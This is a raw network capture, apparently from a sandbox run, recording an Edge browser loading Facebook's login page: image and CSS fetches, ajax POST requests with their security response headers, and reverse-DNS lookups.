permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
x-content-type-options: nosniff
timing-allow-origin: *
strict-transport-security: max-age=15552000; preload
x-fb-debug: Fp8gnWQuWgUBL1axC9qZ6LeKEXAv7Ov6uOSWUqcgpF5l/TUtSQJG5TrPFFdKHnN5iWQ0NBffAPIGwOSrW3+emA==
date: Sun, 17 Sep 2023 23:42:01 GMT
content-length: 22180
GET

https://www.facebook.com/images/cookies/cookie_info_card_image_2.png

MicrosoftEdgeCP.exe

Remote address:

157.240.196.35:443

Request

GET /images/cookies/cookie_info_card_image_2.png HTTP/2.0
host: www.facebook.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
content-md5: wRZKtl/35CrbFpdeWSFrBg==
edge-control: cache-maxage=86400s
expires: Mon, 18 Sep 2023 16:14:47 GMT
cache-control: public,max-age=86400
report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
x-content-type-options: nosniff
timing-allow-origin: *
strict-transport-security: max-age=15552000; preload
x-fb-debug: gExBuWKjo+UGuzVCXY7P32HxPWQkn7PSDCbbf7DvNAvdlTN3NYE9/PnXNh02ZGKesE5q4PWvwgj12LQWSKbq0A==
date: Sun, 17 Sep 2023 16:14:47 GMT
content-length: 21306
GET

https://www.facebook.com/images/cookies/cookie_info_card_image_3.png

MicrosoftEdgeCP.exe

Remote address:

157.240.196.35:443

Request

GET /images/cookies/cookie_info_card_image_3.png HTTP/2.0
host: www.facebook.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
content-md5: VavMdY6kTjDMa/KajpYRaQ==
edge-control: cache-maxage=86400s
expires: Mon, 18 Sep 2023 14:55:44 GMT
cache-control: public,max-age=86400
report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}]}
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
x-content-type-options: nosniff
timing-allow-origin: *
strict-transport-security: max-age=15552000; preload
x-fb-debug: fUuQGcOnI5JP3LiQ5zUOcpqAxJLL+6IJc1FIPr5SV7fqcRbJqMvGWasph7BF8rRqkBVGZshRBNSdFnEe+Z2BeQ==
date: Sun, 17 Sep 2023 14:55:44 GMT
content-length: 50380
GET

https://www.facebook.com/images/cookies/cookie_info_card_image_4.png

MicrosoftEdgeCP.exe

Remote address:

157.240.196.35:443

Request

GET /images/cookies/cookie_info_card_image_4.png HTTP/2.0
host: www.facebook.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
content-md5: mXjbZp5JUjt62zr4DVYbGw==
edge-control: cache-maxage=86400s
expires: Mon, 18 Sep 2023 06:29:47 GMT
cache-control: public,max-age=86400
report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
x-content-type-options: nosniff
timing-allow-origin: *
strict-transport-security: max-age=15552000; preload
x-fb-debug: Bq30PTYcYZ56n5NRnMrSuw7XoMnx24G41vD2qvr8WNaM4rJf+gA+ijPPbeQm7MEk9lyTSEPqrhyjzJ+zyeFOhQ==
date: Sun, 17 Sep 2023 06:29:47 GMT
content-length: 17083
GET

https://www.facebook.com/images/cookies/cookie_info_popup_image_1.png

MicrosoftEdgeCP.exe

Remote address:

157.240.196.35:443

Request

GET /images/cookies/cookie_info_popup_image_1.png HTTP/2.0
host: www.facebook.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
content-md5: tjvKzjcx509sRQAttysmgw==
edge-control: cache-maxage=86400s
expires: Mon, 18 Sep 2023 23:25:52 GMT
cache-control: public,max-age=86400
report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}]}
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
x-content-type-options: nosniff
timing-allow-origin: *
strict-transport-security: max-age=15552000; preload
x-fb-debug: CoTJ7UgQV0vDXh7TzxlJx0LsrSsShtaXUABCBTdOcISv/mmcYi/uIFain7ziNOHYx+WmbuxwjHW+SkLaVSngeg==
date: Sun, 17 Sep 2023 23:25:52 GMT
content-length: 35554
GET

https://www.facebook.com/images/cookies/cookie_info_popup_image_2.png

MicrosoftEdgeCP.exe

Remote address:

157.240.196.35:443

Request

GET /images/cookies/cookie_info_popup_image_2.png HTTP/2.0
host: www.facebook.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
content-md5: vq/Hc42i1NUD0re9tbXumw==
edge-control: cache-maxage=86400s
expires: Mon, 18 Sep 2023 21:39:51 GMT
cache-control: public,max-age=86400
report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
x-content-type-options: nosniff
timing-allow-origin: *
strict-transport-security: max-age=15552000; preload
x-fb-debug: 9wlAHaEsyPYb4bzCXHOM1z4JnEJr1DqMVZ1I6o+Be+0YRYvFhzCMzfT7WAoGHHguAmKPT5EwQazfN8q2SQ/kIQ==
date: Sun, 17 Sep 2023 21:39:51 GMT
content-length: 47514
GET

https://www.facebook.com/images/cookies/cookie_info_popup_image_3.png

MicrosoftEdgeCP.exe

Remote address:

157.240.196.35:443

Request

GET /images/cookies/cookie_info_popup_image_3.png HTTP/2.0
host: www.facebook.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
content-md5: YhcU5SV/bTVsWSaxO4wgGA==
edge-control: cache-maxage=86400s
expires: Mon, 18 Sep 2023 11:38:58 GMT
cache-control: public,max-age=86400
report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}]}, {"max_age":3600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"network-errors"}
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
nel: {"report_to":"network-errors","max_age":3600,"failure_fraction":0.01}
cross-origin-opener-policy: same-origin-allow-popups
x-content-type-options: nosniff
timing-allow-origin: *
strict-transport-security: max-age=15552000; preload
x-fb-debug: +q8ODiow4fOi52QNmwj7Dn0N7Dkohr31RPLrUbxgINTIRDLFeW7Ai7g3lZLu+sDb0aOt6olaAA6pJvlORR0+8g==
date: Sun, 17 Sep 2023 11:38:58 GMT
content-length: 47657
GET

https://www.facebook.com/images/cookies/cookie_info_popup_image_4.png

MicrosoftEdgeCP.exe

Remote address:

157.240.196.35:443

Request

GET /images/cookies/cookie_info_popup_image_4.png HTTP/2.0
host: www.facebook.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
content-md5: Ae8VnBRpCv1xxClCp11bLQ==
edge-control: cache-maxage=86400s
expires: Mon, 18 Sep 2023 08:15:08 GMT
cache-control: public,max-age=86400
report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
x-content-type-options: nosniff
timing-allow-origin: *
strict-transport-security: max-age=15552000; preload
x-fb-debug: DVSB4Vk/TpmieBHALiWGpNdQxlytTUiXZbpqepA4cV2OCrvwcb/8ztKcJR9MqlM00NSZZY50Fgz4IKxQUuQvxQ==
date: Sun, 17 Sep 2023 08:15:08 GMT
content-length: 38147
POST

https://www.facebook.com/ajax/bz?__a=1&__ccg=EXCELLENT&__dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU6C7UW3q327E2vwXw5ux60Vo1upE4W0OE2WxO2O1Vw8G1Qw5Mx61vw5zwwwi81nE1u83mwaS0zE5W0PU1mUdEG0hi0Lo6-0iq0NE&__hs=19618.BP%3ADEFAULT.2.0..0.0&__hsi=7279976805270566567&__jssesw=438&__req=1&__rev=1008687718&__s=%3A%3Asxc73s&__spin_b=trunk&__spin_r=1008687718&__spin_t=1695001685&__user=0&dpr=1&jazoest=2994&lsd=AVri8uzbNi0

MicrosoftEdgeCP.exe

Remote address:

157.240.196.35:443

Request

POST /ajax/bz?__a=1&__ccg=EXCELLENT&__dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU6C7UW3q327E2vwXw5ux60Vo1upE4W0OE2WxO2O1Vw8G1Qw5Mx61vw5zwwwi81nE1u83mwaS0zE5W0PU1mUdEG0hi0Lo6-0iq0NE&__hs=19618.BP%3ADEFAULT.2.0..0.0&__hsi=7279976805270566567&__jssesw=438&__req=1&__rev=1008687718&__s=%3A%3Asxc73s&__spin_b=trunk&__spin_r=1008687718&__spin_t=1695001685&__user=0&dpr=1&jazoest=2994&lsd=AVri8uzbNi0 HTTP/2.0
host: www.facebook.com
accept: */*
origin: https://www.facebook.com
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
content-type: multipart/form-data; boundary=---------------------------7e73b5720270
accept-encoding: gzip, deflate, br
content-length: 891
cache-control: no-cache

Response

HTTP/2.0 200

report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
pragma: no-cache
cache-control: private, no-cache, no-store, must-revalidate
expires: Sat, 01 Jan 2000 00:00:00 GMT
x-content-type-options: nosniff
x-xss-protection: 0
x-frame-options: DENY
access-control-expose-headers: X-FB-Debug, X-Loader-Length
access-control-allow-methods: OPTIONS
access-control-allow-credentials: true
access-control-allow-origin: https://www.facebook.com
vary: Origin
strict-transport-security: max-age=15552000; preload
content-type: text/html; charset="utf-8"
x-fb-debug: YUMTLegh2MmwE8JxSDXujTmSgwA3oJhrlICbLpRrgDmk1KDpoUeEJY+DZmQ+8e14Z4epMfkTAKBoOWtWMGxYfg==
content-length: 0
date: Mon, 18 Sep 2023 01:48:09 GMT
alt-svc: h3=":443"; ma=86400
POST

https://www.facebook.com/ajax/bz?__a=1&__ccg=EXCELLENT&__dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU6C7UW3q327E2vwXw5ux60Vo1upE4W0OE2WxO2O1Vw8G1Qw5Mx61vw5zwwwi81nE1u83mwaS0zE5W0PU1mUdEG0hi0Lo6-0iq0NE&__hs=19618.BP%3ADEFAULT.2.0..0.0&__hsi=7279976805270566567&__jssesw=438&__req=2&__rev=1008687718&__s=%3A%3Asxc73s&__spin_b=trunk&__spin_r=1008687718&__spin_t=1695001685&__user=0&dpr=1&jazoest=2994&lsd=AVri8uzbNi0

MicrosoftEdgeCP.exe

Remote address:

157.240.196.35:443

Request

POST /ajax/bz?__a=1&__ccg=EXCELLENT&__dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU6C7UW3q327E2vwXw5ux60Vo1upE4W0OE2WxO2O1Vw8G1Qw5Mx61vw5zwwwi81nE1u83mwaS0zE5W0PU1mUdEG0hi0Lo6-0iq0NE&__hs=19618.BP%3ADEFAULT.2.0..0.0&__hsi=7279976805270566567&__jssesw=438&__req=2&__rev=1008687718&__s=%3A%3Asxc73s&__spin_b=trunk&__spin_r=1008687718&__spin_t=1695001685&__user=0&dpr=1&jazoest=2994&lsd=AVri8uzbNi0 HTTP/2.0
host: www.facebook.com
accept: */*
origin: https://www.facebook.com
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
content-type: multipart/form-data; boundary=---------------------------7e73c8820270
accept-encoding: gzip, deflate, br
content-length: 8355
cache-control: no-cache

Response

HTTP/2.0 200

report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
pragma: no-cache
cache-control: private, no-cache, no-store, must-revalidate
expires: Sat, 01 Jan 2000 00:00:00 GMT
x-content-type-options: nosniff
x-xss-protection: 0
x-frame-options: DENY
access-control-expose-headers: X-FB-Debug, X-Loader-Length
access-control-allow-methods: OPTIONS
access-control-allow-credentials: true
access-control-allow-origin: https://www.facebook.com
vary: Origin
strict-transport-security: max-age=15552000; preload
content-type: text/html; charset="utf-8"
x-fb-debug: xkvZ1z/ge/9Cxf+iK8FzpXBL3HUGVY1ct18Ez9fPJJ/JmUMbMr4Z0k+Z01ieo7iFmqekrU1rfHQQ3p0CrTbxPg==
content-length: 0
date: Mon, 18 Sep 2023 01:48:10 GMT
alt-svc: h3=":443"; ma=86400
POST

https://www.facebook.com/ajax/bz?__a=1&__ccg=EXCELLENT&__dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU6C7UW3q327E2vwXw5ux60Vo1upE4W0OE2WxO2O1Vw8G1Qw5Mx61vw5zwwwi81nE1u83mwaS0zE5W0PU1mUdEG0hi0Lo6-0iq0NE&__hs=19618.BP%3ADEFAULT.2.0..0.0&__hsi=7279976805270566567&__jssesw=438&__req=3&__rev=1008687718&__s=%3A%3Asxc73s&__spin_b=trunk&__spin_r=1008687718&__spin_t=1695001685&__user=0&dpr=1&jazoest=2994&lsd=AVri8uzbNi0

MicrosoftEdgeCP.exe

Remote address:

157.240.196.35:443

Request

POST /ajax/bz?__a=1&__ccg=EXCELLENT&__dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU6C7UW3q327E2vwXw5ux60Vo1upE4W0OE2WxO2O1Vw8G1Qw5Mx61vw5zwwwi81nE1u83mwaS0zE5W0PU1mUdEG0hi0Lo6-0iq0NE&__hs=19618.BP%3ADEFAULT.2.0..0.0&__hsi=7279976805270566567&__jssesw=438&__req=3&__rev=1008687718&__s=%3A%3Asxc73s&__spin_b=trunk&__spin_r=1008687718&__spin_t=1695001685&__user=0&dpr=1&jazoest=2994&lsd=AVri8uzbNi0 HTTP/2.0
host: www.facebook.com
accept: */*
origin: https://www.facebook.com
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
content-type: multipart/form-data; boundary=---------------------------7e73991020270
accept-encoding: gzip, deflate, br
content-length: 1664
cache-control: no-cache

Response

HTTP/2.0 200

report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
pragma: no-cache
cache-control: private, no-cache, no-store, must-revalidate
expires: Sat, 01 Jan 2000 00:00:00 GMT
x-content-type-options: nosniff
x-xss-protection: 0
x-frame-options: DENY
access-control-expose-headers: X-FB-Debug, X-Loader-Length
access-control-allow-methods: OPTIONS
access-control-allow-credentials: true
access-control-allow-origin: https://www.facebook.com
vary: Origin
strict-transport-security: max-age=15552000; preload
content-type: text/html; charset="utf-8"
x-fb-debug: qGeCehoxM81rSytUHZb6x0juP5HTEhzVw8uxolaxWfg1F+hlUBskKo+qaOOEn7Hee7cDPcjfsLU+KYMdE1wplA==
content-length: 0
date: Mon, 18 Sep 2023 01:48:18 GMT
alt-svc: h3=":443"; ma=86400
POST

https://www.facebook.com/ajax/bz?__a=1&__ccg=EXCELLENT&__dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU6C7UW3q327E2vwXw5ux60Vo1upE4W0OE2WxO2O1Vw8G1Qw5Mx61vw5zwwwi81nE1u83mwaS0zE5W0PU1mUdEG0hi0Lo6-0iq0NE&__hs=19618.BP%3ADEFAULT.2.0..0.0&__hsi=7279976805270566567&__jssesw=438&__req=4&__rev=1008687718&__s=%3A%3Asxc73s&__spin_b=trunk&__spin_r=1008687718&__spin_t=1695001685&__user=0&dpr=1&jazoest=2994&lsd=AVri8uzbNi0

MicrosoftEdgeCP.exe

Remote address:

157.240.196.35:443

Request

POST /ajax/bz?__a=1&__ccg=EXCELLENT&__dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU6C7UW3q327E2vwXw5ux60Vo1upE4W0OE2WxO2O1Vw8G1Qw5Mx61vw5zwwwi81nE1u83mwaS0zE5W0PU1mUdEG0hi0Lo6-0iq0NE&__hs=19618.BP%3ADEFAULT.2.0..0.0&__hsi=7279976805270566567&__jssesw=438&__req=4&__rev=1008687718&__s=%3A%3Asxc73s&__spin_b=trunk&__spin_r=1008687718&__spin_t=1695001685&__user=0&dpr=1&jazoest=2994&lsd=AVri8uzbNi0 HTTP/2.0
host: www.facebook.com
accept: */*
origin: https://www.facebook.com
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
content-type: multipart/form-data; boundary=---------------------------7e73c82520270
accept-encoding: gzip, deflate, br
content-length: 895
cache-control: no-cache

Response

HTTP/2.0 200

report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
pragma: no-cache
cache-control: private, no-cache, no-store, must-revalidate
expires: Sat, 01 Jan 2000 00:00:00 GMT
x-content-type-options: nosniff
x-xss-protection: 0
x-frame-options: DENY
access-control-expose-headers: X-FB-Debug, X-Loader-Length
access-control-allow-methods: OPTIONS
access-control-allow-credentials: true
access-control-allow-origin: https://www.facebook.com
vary: Origin
strict-transport-security: max-age=15552000; preload
content-type: text/html; charset="utf-8"
x-fb-debug: 9OJpkaLTrD5iapsZx54g+t+stu42IbYkLPm/T0HmID9K/rDK6Ryc6jEvSDw0JsCndF+sJzizMrwUFImo7FHL0w==
content-length: 0
date: Mon, 18 Sep 2023 01:48:39 GMT
alt-svc: h3=":443"; ma=86400
DNS

108.26.221.154.in-addr.arpa

Remote address:

8.8.8.8:53

Request

108.26.221.154.in-addr.arpa

IN PTR

Response
DNS

141.179.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

141.179.250.142.in-addr.arpa

IN PTR

Response

141.179.250.142.in-addr.arpa

IN PTR

ams17s10-in-f131e100net
DNS

35.196.240.157.in-addr.arpa

Remote address:

8.8.8.8:53

Request

35.196.240.157.in-addr.arpa

IN PTR

Response

35.196.240.157.in-addr.arpa

IN PTR

edge-star-mini-shv-02-mrs2facebookcom
DNS

35.36.251.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

35.36.251.142.in-addr.arpa

IN PTR

Response

35.36.251.142.in-addr.arpa

IN PTR

ams17s12-in-f31e100net
DNS

static.xx.fbcdn.net

MicrosoftEdge.exe

Remote address:

8.8.8.8:53

Request

static.xx.fbcdn.net

IN A

Response

static.xx.fbcdn.net

IN CNAME

scontent.xx.fbcdn.net

scontent.xx.fbcdn.net

IN A

157.240.196.15
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yE/l/0,cross/RspwE1UYLwr.css?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.196.15:443

Request

GET /rsrc.php/v3/yE/l/0,cross/RspwE1UYLwr.css?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: text/css, */*
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
